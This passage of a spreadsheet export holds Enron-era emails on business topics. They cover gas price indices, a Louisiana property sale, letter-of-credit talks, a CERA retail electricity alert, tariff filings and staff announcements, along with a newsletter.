     PG&amp;E Citygate 	 $2.6500 	 $2.3800 	 $2.5525 	 +.5769 	 227,500 	 PG&amp;E - Citygate  	_x000D_
     SoCal Border 	 $2.7200 	 $2.4000 	 $2.5593 	 +.6743 	 208,000 	 Southern California Border Points (Ehrenberg,Topock,Needles) 	_x000D_
  WEST TEXAS 	   	   	   	   	   	   	_x000D_
     El Paso - Keystone 	 $2.5300 	 $2.3700 	 $2.4526 	 +.7034 	 606,000 	 El Paso - Keystone Pool 	_x000D_
     Waha 	 $2.5700 	 $2.3800 	 $2.5118 	 +.6383 	 245,300 	 Waha Hub - West Texas  	_x000D_
_x000D_
_x000D_
Includes all firm physical fixed price trades done from 7 AM to 11:30 AM Central Prevailing Time on the trade date specified for natural gas delivered on the specified date(s). _x000D_
IntercontinentalExchange is the world's most liquid trading platform for over-the-counter energy and metals.  Active markets include North American power and natural gas, global crude and refined oil products, and precious metals.  Traded instruments include forwards, swaps, and options. _x000D_
In order to receive the proprietary information contained in this email, you acknowledge and agree that you shall not further disseminate the IntercontinentalExchange Market Data contained herein to any person or entity without the express written consent of IntercontinentalExchange.   Furthermore, you acknowledge that (1) IntercontinentalExchange has exclusive and valuable property rights in this data; (2) IntercontinentalExchange's data is being made available to you only for your own business or personal activities; and (3) you cannot communicate the data, in any form, to any other person or entity without the express written consent of IntercontinentalExchange. _x000D_
This data is provided to you free of charge.  IntercontinentalExchange reserves the right to cancel this service at any time for any reason or no reason at all. _x000D_
You agree that IntercontinentalExchange does not make any representations or warranties, express or implied, with respect to the data. _x000D_
To become an Exchange Participant or inquire about the indices, please contact sales@intcx.com. _x000D_
To unsubscribe from this service, click here unsubscribe. _x000D_
?Copyright IntercontinentalExchange, Inc. 2001, All Rights Reserved. </t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 06:11:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'aaron.martinsen@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'b..childress@enron.com', 'daniel.falcone@enron.com', 'adam.giannone@enron.com', 'george.mcclellan@enron.com', 'mark.schroeder@enron.com', 'kevin.mcgowan@enron.com', 'derek.wilson@enron.com', 'trevor.woods@enron.com', 'mark.friedman@enron.com', 'philip.berry@enron.com', 'jay.yu@enron.com', 'richard.hanagriff@enron.com', 'f..moran@enron.com', 'e.taylor@enron.com', 'salil.pradhan@enron.com', "justin.o'malley@enron.com", 'gary.justice@enron.com', 'nat.kreamer@enron.com', 'chad.pennix@enron.com', 'jay.vandenberg@enron.com', 'ted.noble@enron.com', 'tom.mcquade@enron.com', 'omar.hasan@enron.com', 'steve.jacobellis@enron.com', 'scott.pack@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">McQuade wins tie breaker over Moran._x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 01:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>EMAZING Bible Verse of the Day - Mark 12.43</t>
  </si>
  <si>
    <t>=09=09EMAZING Home[IMAGE]Edit Your ProfilePrivacy_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Advice and Living - Brain Candy - Business and Money - Comics - Daybr=_x000D_
eakers -=20_x000D_
Entertainment_x000D_
=09=09Espa=0Fol - Games - Good Thoughts - Grapevine - Greetings - Health - =_x000D_
Hobbies -=20_x000D_
Horoscopes_x000D_
=09=09Household Hints - Kitchen - Music - Sports - Style - Technology - Tra=_x000D_
vel -=20_x000D_
Wireless_x000D_
=09=09_x000D_
_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09=3D=3D One click feeds one person =3D=3D_x000D_
=09=09Please join Emazing in helping feed thousands of people who would oth=_x000D_
erwise=20_x000D_
go hungry this holiday season.  When you click on www.givingpool.org today,=_x000D_
=20_x000D_
Zthing.com will donate $1.12 to provide a meal for one person - just for=20_x000D_
visiting the site! Click  here for more details.=20_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09Bible Verse of the Day_x000D_
=09=09Friday November 17, 2000_x000D_
=09=09_x000D_
=09=09Mark 12.43 =20_x000D_
=09=09_x000D_
=09=09The Access Bible, NRSV, New Testament, Page 71_x000D_
=09=09_x000D_
=09=09"Then he called his disciples and said to them, 'Truly I tell you, th=_x000D_
is poor=20_x000D_
widow has put in more than all those who are contributing to the treasury.'=_x000D_
"_x000D_
=09=09_x000D_
=09=09Visit The Access Bible from Oxford University Press Online!_x000D_
=09=09_x000D_
=09=09Email  this tip to a friend - Browse  the Archives_x000D_
=09=09[IMAGE]_x000D_
=09=09_x000D_
=09=09 SPIRITUAL BOOK OF THE DAY_x000D_
=09=09Iyanla Vanzant: In the Meantime_x000D_
=09=09_x000D_
=09=09MOVIE OF THE DAY_x000D_
=09=09Left Behind_x000D_
=09=09_x000D_
=09=09Bush vs. Gore:  the cam-pain continues._x000D_
=09=09Seek relief on the inDecision2000 'Vine._x000D_
=09=09_x000D_
=09=09Got something to say?_x000D_
=09=09Hello...I love you...Congratulations...Thinking of you...Happy birthd=_x000D_
ay.=20_x000D_
Whatever you wanna say, let Emazing's e-greetings say it for you! We have=_x000D_
=20_x000D_
hundreds of the coolest greetings around. They're fun, FREE, and easy to=20_x000D_
send. Click here for more information._x000D_
=09=09_x000D_
=09=09Our e-greetings aren't turkeys..._x000D_
=09=09But we have plenty with turkeys on them to celebrate your holiday=20_x000D_
get-togethers and feasts!_x000D_
=09=09_x000D_
=09=09JobsOnline is giving away $10,000 instant cash!_x000D_
=09=09JobsOnline is one of the Internet's leading sites for employment info=_x000D_
rmation=20_x000D_
and career resources._x000D_
=09=09_x000D_
=09=09     QUOTE OF THE DAY_x000D_
=09=09I=01,m not like George Bush. If he wins or loses, life goes on. I=01,=_x000D_
ll do anything=20_x000D_
to win._x000D_
=09=09- Al Gore_x000D_
=09=09_x000D_
=09=09 [IMAGE]_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09_x000D_
=09=09  Does "email program" mean "geek Greek" to you?_x000D_
=09=09Don't let email confuse you! Get FREE Outlook 2000 tips from EMAZING.=_x000D_
 Soon=20_x000D_
you'll be setting up folders, sending tricky attachments, customizing your=_x000D_
=20_x000D_
views, and scheduling appointments. It's as easy as 1-2-3 with these tips!=_x000D_
=20_x000D_
Click  here for more details.  =20_x000D_
=09=09_x000D_
=09=09[IMAGE]_x000D_
=09=09?_x000D_
=09=09Advertise - Company Info - Feedback - Help - Jobs - Privacy Policy - =_x000D_
Terms &amp;=20_x000D_
Conditions_x000D_
=09=09Archives - Edit Your Profile -?Unsubscribe_x000D_
=09=09_x000D_
=09=09EMAZING.com is a service of EMAZING, INC. Copyright 2000. All Rights =_x000D_
Reserved._x000D_
=09=09EMAZING.com - Whatever you're into, we email it to you. FREE!=20_x000D_
[IMAGE]</t>
  </si>
  <si>
    <t>Sun, 21 Jan 2001 12:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'btate1@epelectric.com'})</t>
  </si>
  <si>
    <t>Preschedules</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mark Guzman/PDX/ECT on 01/21/2001 10:22 _x000D_
PM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Mark Guzman                           01/21/2001 08:20 PM_x000D_
	_x000D_
_x000D_
To: btate1@epelectric.com_x000D_
cc:  _x000D_
Subject: Preschedules_x000D_
_x000D_
_x000D_
_x000D_
Tate, go to the tab on this spredsheet for 1/22 and print.  Give me a call _x000D_
afterward._x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 15:47:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pkdaigle@neosoft.com'})</t>
  </si>
  <si>
    <t>Re: Sale of Napoleonville, LA property,  Our file ENR-02</t>
  </si>
  <si>
    <t xml:space="preserve">Gerald:  I have already completed #1. On #2, they just want some_x000D_
assurance that the property has never had underground storage tanks or_x000D_
other hazardous waste sources on it.  I believe a letter from LRCI_x000D_
stating that to its knowledge there have been no such sources on or_x000D_
under the Property would suffice.  As far as #3, my abstractor has_x000D_
promised to complete this limited title search today.  I hope to hear_x000D_
from him tommorrow._x000D_
_x000D_
PKD_x000D_
_x000D_
Nemec, Gerald wrote:_x000D_
_x000D_
&gt;Keith,  Please revise the document to reflect Item 1 below.  With_x000D_
&gt;respect to Item 2, our environmental group is reviewing Enron's use of_x000D_
&gt;the property.  No such uses should be found.  What specifically are they_x000D_
&gt;looking for with respect to this item.  Finally, any word on the title_x000D_
&gt;check with respect to item #3._x000D_
&gt;_x000D_
&gt;&gt; -----Original Message-----_x000D_
&gt;&gt;From: 	"P. Keith Daigle" &lt;pkdaigle@neosoft.com&gt;@ENRON_x000D_
&gt;&gt;[mailto:IMCEANOTES-+22P+2E+20Keith+20Daigle+22+20+3Cpkdaigle+40neosoft_x000D_
&gt;&gt;+2Ecom+3E+40ENRON@ENRON.com]_x000D_
&gt;&gt;Sent:	Wednesday, August 29, 2001 4:13 PM_x000D_
&gt;&gt;To:	Nemec, Gerald_x000D_
&gt;&gt;Subject:	Sale of Napoleonville, LA property,  Our file ENR-02_x000D_
&gt;&gt;_x000D_
&gt;&gt;Gerald:_x000D_
&gt;&gt;_x000D_
&gt;&gt;    I have been contacted by Kim Torres of the Assumption Parish_x000D_
&gt;&gt;Police_x000D_
&gt;&gt;Jury.  She has some questions and concerns about the Purchase &amp; Sale_x000D_
&gt;&gt;Agreement, to wit:_x000D_
&gt;&gt;_x000D_
&gt;&gt;1).  They want to add warranty language to ? 4 as follows:_x000D_
&gt;&gt;_x000D_
&gt;&gt;    Seller warrants that it is the record title owner to the property_x000D_
&gt;&gt;being sold, and warrants it has good and merchantable title, free of_x000D_
&gt;&gt;any_x000D_
&gt;&gt;and all liens or encumbrances, and agrees to indemnify and hold_x000D_
&gt;&gt;harmless_x000D_
&gt;&gt;buyer for the same._x000D_
&gt;&gt;_x000D_
&gt;&gt;    Seller warrants that it is a corporation in good standing and that_x000D_
&gt;&gt;persons executing this sale on behalf of seller has valid and binding_x000D_
&gt;&gt;authority to do so._x000D_
&gt;&gt;_x000D_
&gt;&gt;I believe this additional language is acceptable with some minor_x000D_
&gt;&gt;revisions which I will do._x000D_
&gt;&gt;_x000D_
&gt;&gt;2).  They are concerned about the warranty language which covers_x000D_
&gt;&gt;hazardous wastes in ? 4.  They tell me that they have not done an_x000D_
&gt;&gt;environmental inspection of the property.  They want to know if there_x000D_
&gt;&gt;have ever been any underground tanks or other hazardous waste sources_x000D_
&gt;&gt;on_x000D_
&gt;&gt;the property.  They are looking for something in writing that no such_x000D_
&gt;&gt;sources existed._x000D_
&gt;&gt;_x000D_
&gt;&gt;3).  Upon checking the conveyance records, they found that on March_x000D_
&gt;&gt;31,_x000D_
&gt;&gt;1993, Louisiana Resources Pipeline Co., L.P. sold the property to_x000D_
&gt;&gt;Louisiana Resources Co., Inc.  Then, on February 28, 2000, Louisiana_x000D_
&gt;&gt;Resources Pipeline Co., L.P. again sold the property to LRCI, Inc.  I_x000D_
&gt;&gt;have not done a title exam so I cannot explain this discrepancy._x000D_
&gt;&gt;_x000D_
&gt;&gt;4).  She gave me the physical address of the property and the name of_x000D_
&gt;&gt;the Police Jury President which I will insert in the documents._x000D_
&gt;&gt;_x000D_
&gt;&gt;Please contact me to discuss our response to these concerns._x000D_
&gt;&gt;_x000D_
&gt;&gt;Keith_x000D_
&gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;**********************************************************************_x000D_
&gt;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_x000D_
&gt;**********************************************************************_x000D_
&gt;_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 03:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Hi Carol -_x000D_
Sorry for the delay.  The "credit person" at Inland is probably Julie Beck,_x000D_
although she can naturally be overruled by the Temple-Inland Treasurer, Dave_x000D_
Turpin, or CFO Randy Levy, since Temple-Inland will be obtaining the letter_x000D_
of credit and will serve as guarantor.  Since they are at least one step_x000D_
removed from the process, if you could tell me what questions/comments from_x000D_
my 5/16 memo they will need to address, and ideally your_x000D_
responses/commentary in some summary format, I can upstream this information_x000D_
to them, obtain their feedback, and speak on their behalf._x000D_
Thanx,_x000D_
Jack Falconi_x000D_
_x000D_
_x000D_
-----Original Message-----_x000D_
From: Carol.St.Clair@enron.com [mailto:Carol.St.Clair@enron.com]_x000D_
Sent: Thursday, May 24, 2001 3:57 PM_x000D_
To: Jack.Falconi@guarantygroup.com_x000D_
Subject: Meeting_x000D_
_x000D_
_x000D_
Jack:_x000D_
My assistant will be calling you to set up a time next week when Ken Curry_x000D_
and I can discuss your comments with you and your credit person.  Her name_x000D_
is Suzanne Adams._x000D_
_x000D_
Carol St. Clair_x000D_
EB 3889_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 02:38:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: Statistician from Rice</t>
  </si>
  <si>
    <t xml:space="preserve">Osman,_x000D_
_x000D_
This guy is too much._x000D_
I would tell him that we understand_x000D_
that he has to make the best choice_x000D_
for himself  and can change his mind  but at this point we treat _x000D_
his decision as final but we still  appreciate the interest he showed_x000D_
in Enron._x000D_
_x000D_
We never had any luck hiring a statistician._x000D_
Maybe we shall get one some day._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Osman Sezgen@EES_x000D_
04/20/2001 11:54 AM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT, Pinnamaneni Krishnarao/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Statistician from Rice_x000D_
_x000D_
I had a message on my phone this morning from WIlliam indicating that_x000D_
he had changed his mind and will be taking another job. He also mentions that_x000D_
the other organization will give him time to publish his  thesis and he _x000D_
assumes _x000D_
Enron would not do that._x000D_
_x000D_
I am inclined to give up on him but wanted to get your input before doing so._x000D_
_x000D_
Osman_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 15 May 2002 10:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Sampling Model</t>
  </si>
  <si>
    <t xml:space="preserve">Kevin,_x000D_
_x000D_
In my previous e-mail I said the sampling frequency will affect the final _x000D_
result when it comes to calculating payment for consumed power.  I have _x000D_
modeled the impact of frequency.  This model demonstrates that the frequency _x000D_
is significant in the final answer.   Take a look at the column totals for _x000D_
each measurement frequency._x000D_
_x000D_
In my e-mail I referenced the SCADA system and did not include the sub _x000D_
station as it was not my intention to include a reference to the substation.  _x000D_
I agree that we can integrate the values at the substation to get a total net _x000D_
power but this ignores the constraint the utility is introducing, chiefly _x000D_
that they want to be paid for consumed power at a different rate than the _x000D_
rate they pay for power._x000D_
_x000D_
In the model you will find 30 time intervals for measurement.  They can be _x000D_
whatever intervals you want.  Then there are measurement frequencies which _x000D_
are defined in terms of the intervals.  Since the utility requires that we _x000D_
pay for consumed power you can see we may have intervals where we have _x000D_
consumed power but don't pay anything because during the same interval we net _x000D_
positive power.  Conversely the opposite is also true._x000D_
_x000D_
I set this up with random numbers ranging from -25 to 100 to illustrate many _x000D_
scenarios._x000D_
_x000D_
Regards,_x000D_
Hollis_x000D_
</t>
  </si>
  <si>
    <t>Thu, 30 Nov 2000 01:48:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jeffrey.keeler@enron.com', 'steve.walton@enron.com', 'joan.stransky@enron.com', 'robert.neustaedter@enron.com', 'tom.hoatson@enron.com', 'linda.noske@enron.com', 'lisa.yoho@enron.com', 'margo.reyna@enron.com', 'frank.rishe@enron.com', 'lysa.akin@enron.com', 'marchris.robinson@enron.com', 'paul.kaufman@enron.com', 'vinio.floris@enron.com', 'chauncey.hood@enron.com', 'thane.twiggs@enron.com', 'jeff.brown@enron.com', 'lynnette.barnes@enron.com', 'scott.bolton@enron.com', 'xi.xi@enron.com', 'mary.schoen@enron.com', 'ron.mcnamara@enron.com', 'kathleen.sullivan@enron.com', 'harry.kingerski@enron.com', 'sharonda.stephens@enron.com', 'robert.frank@enron.com', 'susan.landwehr@enron.com', 'gloria.ogenyi@enron.com', 'margaret.carson@enron.com', 'sandra.mccubbin@enron.com', 'roy.boston@enron.com', 'john.neslage@enron.com', 'joe.connor@enron.com', 'marcie.milner@enron.com', 'stephen.burns@enron.com', 'linda.robertson@enron.com', 'stella.chan@enron.com', 'cynthia.sandherr@enron.com', 'stacey.bolton@enron.com', 'joe.hillings@enron.com', 'bill.moore@enron.com', 'eric.benson@enron.com', 'steve.montovano@enron.com', 'ginger.dernehl@enron.com', 'susan.mara@enron.com', 'kirsten.bellas@enron.com', 'aleck.dadson@enron.com', 'allison.navin@enron.com', 'angela.wilson@enron.com', 'jean.dressler@enron.com', 'gus.perez@enron.com', 'robin.kittel@enron.com', 'elizabeth.linnell@enron.com', 'jeff.dasovich@enron.com', 'bernadette.hawkins@enron.com', 'donald.lassere@enron.com', 'barbara.hueter@enron.com', 'sue.nord@enron.com', 'alan.comnes@enron.com', 'rubena.buerger@enron.com', 'geriann.warner@enron.com', 'patrick.keene@enron.com', 'miyung.buster@enron.com', 'tom.chapman@enron.com', 'sarah.novosel@enron.com', 'marcia.linton@enron.com', 'mona.petrochko@enron.com', 'amy.fabian@enron.com', 'leslie.lawner@enron.com', 'kathy.mongeon@enron.com', 'tracy.cooper@enron.com', 'gia.maisashvili@enron.com', 'joe.allen@enron.com', 'lara.leibman@enron.com', 'nancy.hetrick@enron.com', 'daniel.allegretti@enron.com', 'carolyn.cooney@enron.com', 'christi.nicolay@enron.com', 'maureen.mcvicker@enron.com', 'stephanie.mcmurray@enron.com', 'richard.ingersoll@enron.com', 'tom.briggs@enron.com', 'terri.miller@enron.com', "earlene.o'connell@enron.com", 'dave.mangskau@enron.com', 'robert.hemstock@enron.com', 'lindsay.meade@enron.com', 'dan.staines@enron.com', 'mary.hain@enron.com', 'lora.sullivan@enron.com', 'chris.long@enron.com', 'richard.shapiro@enron.com', 'damon.harvey@enron.com', 'joseph.alamo@enron.com', 'steven.kean@enron.com', 'janine.migden@enron.com', 'charles.yeung@enron.com', 'howard.fromer@enron.com', 'tom.delaney@enron.com', 'linda.lawrence@enron.com', 'james.steffes@enron.com', 'jean.ryall@enron.com', 'kerry.stroup@enron.com', 'joe.hartsoe@enron.com', 'laurie.knight@enron.com'})</t>
  </si>
  <si>
    <t>Retail Electricity: Limited Chances to Play Won't Bench the_x000D_
 Competition... - CERA Alert</t>
  </si>
  <si>
    <t xml:space="preserve">See msg. from Margaret Carson._x000D_
_x000D_
gngr_x000D_
713-853-7751_x000D_
----- Forwarded by Ginger Dernehl/NA/Enron on 11/30/2000 09:44 AM -----_x000D_
_x000D_
	Margaret Carson_x000D_
	11/30/2000 09:38 AM_x000D_
		 _x000D_
		 To: Ginger Dernehl/NA/Enron@Enron_x000D_
		 cc: _x000D_
		 Subject: Retail Electricity: Limited Chances to Play Won't Bench the _x000D_
Competition... - CERA Alert_x000D_
_x000D_
Ginger, Please send this to all govt affairs people  as it has  some very _x000D_
good insights into_x000D_
State by State initiatives.  Thanks,   Margaret _x000D_
---------------------- Forwarded by Margaret Carson/Corp/Enron on 11/30/2000 _x000D_
09:36 AM ---------------------------_x000D_
_x000D_
_x000D_
Margaret Carson_x000D_
11/30/2000 07:20 AM_x000D_
To: James M Wood/HOU/EES@EES, Jennifer Smith/HOU/EES@EES, Andy _x000D_
West/NA/Enron@Enron, James D Steffes/NA/Enron@Enron, Kathleen E _x000D_
Magruder/HOU/EES@EES_x000D_
cc:  _x000D_
_x000D_
Subject: Monthly Briefing: Limited Chances to Play Won't Bench the _x000D_
Competition... - CERA Alert_x000D_
_x000D_
Some  good insight  here..Margaret_x000D_
---------------------- Forwarded by Margaret Carson/Corp/Enron on 11/30/2000 _x000D_
07:19 AM ---------------------------_x000D_
_x000D_
_x000D_
webmaster@cera.com on 11/29/2000 09:03:06 PM_x000D_
To: Margaret.Carson@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Monthly Briefing: Limited Chances to Play Won't Bench the _x000D_
Competition... - CERA Alert_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
CERA Alert: Sent Wed, November 29, 2000_x000D_
**********************************************************************_x000D_
_x000D_
Title: Monthly Briefing: Limited Chances to Play Won't Bench the _x000D_
Competition..._x000D_
Author: Biehl, Behrens_x000D_
E-Mail Category: Alert_x000D_
Product Line: Retail Energy ,_x000D_
URL: http://www.cera.com/cfm/track/eprofile.cfm?u=3014&amp;m=1430 ,_x000D_
_x000D_
Alternative URL: _x000D_
http://www.cera.com/client/ref/alt/112900_19/ref_alt_112900_19_ab.html_x000D_
*********************************************************_x000D_
_x000D_
RETAIL MARKTERS SEE OPPORTUNITY IN NONTRADITIONAL_x000D_
WAYS TO GROW CUSTOMER BASE_x000D_
With a tight supply-demand balance for natural gas and power in most US _x000D_
regions,_x000D_
CERA sees another difficult year ahead for retail marketers._x000D_
_x000D_
* Nontraditional means of acquiring customer bases may offer a better_x000D_
opportunity for retail marketers to build market share in 2001 in order to be_x000D_
better positioned when more attractive retail market opportunities open in_x000D_
2002._x000D_
_x000D_
* Competitive retail suppliers are looking closely at supplying the regulated_x000D_
customer base (through standard offer or default service) and municipal_x000D_
aggregation to build customer base._x000D_
_x000D_
Movements by regulators to reset prices below market standard offers for _x000D_
power are_x000D_
improving market conditions in several US Northeast states._x000D_
_x000D_
**end**_x000D_
_x000D_
Follow URL for complete Monthly Briefing._x000D_
_x000D_
*********************************************************_x000D_
Come Shoot the Rapids with us at CERAWeek2001, "Shooting the Rapids: _x000D_
Strategies and Risks for the Energy Future" in Houston, February 12-16, _x000D_
2001!  For more information and to register, please visit _x000D_
http://www.cera.com/ceraweek/_x000D_
*********************************************************_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
Account Changes_x000D_
To edit your personal account information, including your e-mail_x000D_
address, etc. go to: http://eprofile.cera.com/cfm/edit/account.cfm_x000D_
_x000D_
This electronic message and attachments, if any, contain information_x000D_
from Cambridge Energy Research Associates, Inc. (CERA) which is_x000D_
confidential and may be privileged. Unauthorized disclosure, copying,_x000D_
distribution or use of the contents of this message or any attachments,_x000D_
in whole or in part, is strictly prohibited._x000D_
_x000D_
Terms of Use: http://www.cera.com/tos.html_x000D_
Questions/Comments: webmaster@cera.com_x000D_
Copyright 2000. Cambridge Energy Research Associates_x000D_
  _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 23 May 2001 10:17:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Partial List of Enron Corp./Enron Supply Corp. deals attached</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Cheryl Nelson_x000D_
Senior Counsel_x000D_
EB3816_x000D_
(713) 345-4693_x000D_
http://gss.enron.com/</t>
  </si>
  <si>
    <t>Fri, 5 Jan 2001 03:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>CA Energy Development documents</t>
  </si>
  <si>
    <t xml:space="preserve">I can never get both of your email addresses right at the same time._x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 01/05/2001 11:49 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
01/05/2001 11:40 AM_x000D_
To: lee.johnson@ps.ss.ge.com, kent.shoemaker@ae.ge.com_x000D_
cc:  _x000D_
_x000D_
Subject: CA Energy Development documents_x000D_
_x000D_
Lee,_x000D_
_x000D_
You should be receiving a package shortly containing the following:_x000D_
_x000D_
1. Changed pages for CA Energy Development I and CA Energy Development II _x000D_
facility agreements.  These are the same pages that were faxed to you and _x000D_
Kent a few days ago.  I also included a couple of original pages (73, 74, I _x000D_
think) which were missing from one of the originals.  This need to be _x000D_
initialled and executed._x000D_
2. Acknowledgement letters for each of CAED I and CAED II which need your _x000D_
Here's the form:_x000D_
_x000D_
3. Assignment and assumption agreement to move the equipment from TurboPark _x000D_
to the CAED I.  There will be one for CAED II as well.  This document is _x000D_
being reviewed by the bank, so I'm not convinced it is in final form.  You _x000D_
will note that there is an acknowledgement section for GE.  I cut and pasted _x000D_
from the consent to assignment from the TurboPark documents, but shortened _x000D_
the whole thing considerably.  Here's that document:_x000D_
_x000D_
_x000D_
_x000D_
4.  Signature pages (signed by Enron) from the ESA deal, both the facility _x000D_
agreement and the override letter.  Obviously, we need your signature.  _x000D_
_x000D_
_x000D_
I will forward the final CA facility agreements to you once again, along with _x000D_
the blacklines against what you initialled._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 Aug 2000 07:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'public.affairs@enron.com'})</t>
  </si>
  <si>
    <t>CAROLYN GREEN</t>
  </si>
  <si>
    <t xml:space="preserve">Carolyn Green, Vice President - Government Affairs, has advised us of her=_x000D_
=20_x000D_
resignation from Enron Corp. effective Friday =01) August 4, 2000.  Carolyn=_x000D_
 is=20_x000D_
pursuing an opportunity with Sunoco, Inc. as their Vice President for Healt=_x000D_
h,=20_x000D_
Environment and Safety and will be making Philadelphia her new home base._x000D_
We want to thank Carolyn for her hard work and many contributions to Azurix=_x000D_
=20_x000D_
and Enron.  Please join me in wishing Carolyn the very best in her new=20_x000D_
venture._x000D_
_x000D_
For those of you in Houston  - there will be a going away party/happy hour =_x000D_
on=20_x000D_
Friday, August 4th at the Midtown Station - starting at=20_x000D_
5:30 p.m._x000D_
_x000D_
The Midtown Station_x000D_
2306 Brazos. =20_x000D_
_x000D_
Easy to get to:   Take Smith south to Hadley and turn right.  Then turn rig=_x000D_
ht=20_x000D_
on Brazos and you're there.  Pizzas will be ordered from a place across the=_x000D_
=20_x000D_
street that makes them in a woodburning oven.  Everyone is welcome! </t>
  </si>
  <si>
    <t>Fri, 17 Nov 2000 02:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lee.johnson@ss.ps.ge', 'dale.rasmussen@enron.com', 'kent.shoemaker@ae.ge.com'})</t>
  </si>
  <si>
    <t>How do we look for a conference call today?  I'll be open in about an hour._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 09:29:38 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'scott.sitter@enron.com', 'walt.serrano@enron.com'})</t>
  </si>
  <si>
    <t>Lost Creek Fuel Bid for November 01</t>
  </si>
  <si>
    <t>ENA bids CIG Gas Daily +.03 for fuel in November._x000D_
_x000D_
Theresa</t>
  </si>
  <si>
    <t>Mon, 10 Sep 2001 13:10:45 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'joe.gordon@enron.com', 'george.wood@enron.com', 'j..broderick@enron.com', 'mark.bernstein@enron.com', 'dana.davis@enron.com', 'michael.brown@enron.com', 'gautam.gupta@enron.com', 'ricardo.perez@enron.com', 'jeffrey.miller@enron.com', 'tom.hoatson@enron.com', 'joe.stepenovitch@enron.com', 'jeff.ader@enron.com', 'john.llodra@enron.com', 'n..stewart@enron.com', 'chris.dorland@enron.com', 'janelle.scheuer@enron.com', 'david.guillaume@enron.com', 'f..campbell@enron.com', 'narsimha.misra@enron.com', 'd..thomas@enron.com', 'posey.martinez@enron.com', 'gerald.gilbert@enron.com', 'tom.dutta@enron.com', 'tom.may@enron.com', 'joe.quenet@enron.com', 'howard.fromer@enron.com', 'scott.healy@enron.com', 'shelley.plauche@enron.com', 'robert.stalford@enron.com'})</t>
  </si>
  <si>
    <t>NYISO tariff revisions (ER01-2251)</t>
  </si>
  <si>
    <t xml:space="preserve">On August 28, 2001, the New York Independent System Operator, Inc. (NYISO) filed revisions to its Market Administration and Control Area Services Tariff in order to establish the criteria by which it will evaluate the need to reestablish Regulation penalties and to define factor Kpi, a factor used in the calculation of availability payments made to Suppliers of Regulation service.  The filing is being made to comply with a Commission order.  NYISO has requested an effective date of July 25, 2001 for the tariff provisions.  (Notice issued Sept. 7; interventions/protests due Sept. 18, 2001.)_x000D_
If you would like a copy of the filing or any further information, please let me know._x000D_
Susan Lindberg   x30596 </t>
  </si>
  <si>
    <t>Fri, 8 Jun 2001 12:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: New group names for CAS</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
Here is the list_x000D_
Thanks Ramona_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Ratliff, Dale  _x000D_
Sent:	Wednesday, June 06, 2001 11:55 AM_x000D_
To:	Kurniawan, Hendra_x000D_
Cc:	Betancourt, Ramona _x000D_
Subject:	FW: New group names for CAS_x000D_
_x000D_
I think this is the file that Ramona is referring to._x000D_
_x000D_
Dale_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Frazier, Perry  _x000D_
Sent:	Tuesday, May 01, 2001 4:15 PM_x000D_
To:	Hyatt, Kevin_x000D_
Cc:	Ratliff, Dale; Schoolcraft, Darrell; Betancourt, Ramona ; Schoolcraft, Darrell; Hoang, Joe; Licciardo, Jeanne; Medeles, Gerry_x000D_
Subject:	New group names for CAS_x000D_
_x000D_
Kevin:_x000D_
_x000D_
Check out the spreadsheet and give me your thoughts for the new group names.  Please mark the wish list for the groups you want posted to the EBB._x000D_
_x000D_
PT 3-0667_x000D_
_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 07:17:37 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Paper</t>
  </si>
  <si>
    <t xml:space="preserve">Vince, I sent the message below to Darrell today._x000D_
_x000D_
--------------------------------------------------------------_x000D_
Hi, Darrell,_x000D_
how are you?_x000D_
